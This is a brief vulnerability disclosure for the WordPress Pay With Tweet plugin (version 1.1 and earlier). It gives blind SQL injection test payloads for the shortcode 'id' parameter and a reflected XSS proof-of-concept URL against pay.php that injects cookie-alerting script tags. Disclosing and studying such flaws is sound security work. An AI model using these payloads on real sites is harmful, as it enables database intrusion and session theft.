WordPress Pay With Tweet Plugin <= 1.1 Multiple Vulnerabilities

1)  Blind SQL Injection in shortcode:
    Short code parameter 'id' is prone to blind sqli, 
    you need to be able to write a post/page to exploit this:

    [paywithtweet id="1' AND 1=2"]
    [paywithtweet id="1' AND 1=1"]

2)  Multiple XSS in pay.php

    After connecting to twitter:
    After submitting the tweet:

    The final download link will be replaced with [REDIRECT-TO-URL]

    POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"><script>alert(document.cookie)</script>